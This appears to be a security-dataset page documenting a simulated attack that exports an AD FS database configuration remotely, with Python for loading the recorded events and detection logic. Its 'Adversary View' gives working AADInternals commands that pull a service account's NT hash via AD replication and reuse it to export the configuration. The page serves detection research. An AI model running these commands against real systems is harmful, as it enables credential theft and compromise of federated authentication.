Export ADFS Database Configuration Remotely

Metadata

Contributors: Roberto Rodriguez @Cyb3rWard0g

Creation Date: 2021/04/27

Modification Date: 2021/04/27

Tactics: TA0008

Techniques: T0000

Tags: None

Dataset Description

This dataset represents a threat actor exporting the AD FS database configuration remotely over HTTP.

Simulation Metadata

Tools

| Type | Name | Module |
| --- | --- | --- |
| PowerShell Module | AADInternals | Export-AADIntADFSConfiguration |

Adversary View

```powershell
# ADFS Service Account
$UserObjectGUID = 'd1713029-72e2-4101-8486-1db074944f23'
# Domain Admin credentials
$credentials = Get-Credential
# Get Hash via AD replication
$Hash = Get-AADIntADUserNTHash -ObjectGuid $UserObjectGUID -Credentials $credentials -Server 'DC01.blacksmith.local' -AsHex
# Retrieve AD FS database configuration over HTTP
$ADFSDatabaseConfig = Export-AADIntADFSConfiguration -Hash '97bff5626068f351a5f9891b97b04640' -SID 'S-1-5-21-3226634481-2224579835-4276826623-1103' -Server ADFS01.blacksmith.local
```

Explore Datasets

Download & Decompress Dataset

```python
import requests
from zipfile import ZipFile
from io import BytesIO

# The URL must be a string literal; the original line was missing its quotes.
url = 'https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/aadinternals_export_adfsdatabaseconfig_remotely.zip'
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
# Extract the first (and only) file in the archive: a JSON-lines event dump
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])
```

Read JSON File

```python
import pandas as pd

# Each line of the file is one JSON event, hence lines=True
df = pd.read_json(path_or_buf=datasetJSONPath, lines=True)
```

Access Security Events

```python
df.groupby(['Channel']).size().sort_values(ascending=False)
```
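Once the events are loaded, the two steps shown in the Adversary View (pulling the service-account hash via AD replication, then authenticating to the AD FS server over the network with it) leave separate traces in the Security channel. The following is an added example, not part of the dataset or of AADInternals: it parses a constructed JSON-lines sample in the same layout as the dataset and flags each step. The field names (EventID, Hostname, SubjectUserName, TargetUserName, LogonType, IpAddress, Properties), the service-account name and the farm IP list are assumptions to adjust for your environment.

```python
import json

# Constructed sample events in the dataset's JSON-lines layout (assumed field names).
SAMPLE_JSONL = "\n".join(json.dumps(e) for e in [
    # DC: a user account exercising directory replication rights (hash retrieval step)
    {"Channel": "Security", "EventID": 4662, "Hostname": "DC01.blacksmith.local",
     "SubjectUserName": "adminuser", "ObjectServer": "DS",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    # AD FS server: network logon as the service account from a farm member (expected)
    {"Channel": "Security", "EventID": 4624, "Hostname": "ADFS01.blacksmith.local",
     "TargetUserName": "adfsadmin", "LogonType": 3, "IpAddress": "192.168.2.10"},
    # AD FS server: same account and logon type, but from a workstation address
    {"Channel": "Security", "EventID": 4624, "Hostname": "ADFS01.blacksmith.local",
     "TargetUserName": "adfsadmin", "LogonType": 3, "IpAddress": "192.168.2.50"},
    # AD FS server: service logon of the same account, not a network logon
    {"Channel": "Security", "EventID": 4624, "Hostname": "ADFS01.blacksmith.local",
     "TargetUserName": "adfsadmin", "LogonType": 5, "IpAddress": "-"},
])

# Control access rights that permit pulling replication data (incl. secrets) from a DC.
REPLICATION_GUIDS = ("1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",   # DS-Replication-Get-Changes
                     "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2")   # DS-Replication-Get-Changes-All
ADFS_FARM_IPS = {"192.168.2.10"}       # assumption: addresses of legitimate AD FS farm nodes
ADFS_SERVICE_ACCOUNT = "adfsadmin"     # assumption: the AD FS service account name
MACHINE_ACCOUNT_SUFFIX = "$"           # DC machine accounts replicate with each other legitimately


def load_events(jsonl_text):
    """Parse JSON-lines text into a list of event dicts, skipping blank lines."""
    return [json.loads(line) for line in jsonl_text.splitlines() if line.strip()]


def replication_by_user_accounts(events):
    """4662 directory-service events where a non-machine account used replication rights."""
    return [e for e in events
            if e.get("EventID") == 4662 and e.get("ObjectServer") == "DS"
            and not e.get("SubjectUserName", "").endswith(MACHINE_ACCOUNT_SUFFIX)
            and any(g in e.get("Properties", "").lower() for g in REPLICATION_GUIDS)]


def adfs_service_logons_from_unknown_hosts(events):
    """Network (type 3) logons with the AD FS service account whose source is not a farm node."""
    return [e for e in events
            if e.get("EventID") == 4624 and e.get("LogonType") == 3
            and e.get("TargetUserName", "").lower() == ADFS_SERVICE_ACCOUNT
            and e.get("IpAddress") not in ADFS_FARM_IPS]
```

Run both functions over `load_events(open(datasetJSONPath).read())` to apply the same logic to the downloaded dataset; a hit in each function within a short window is the pattern this dataset records.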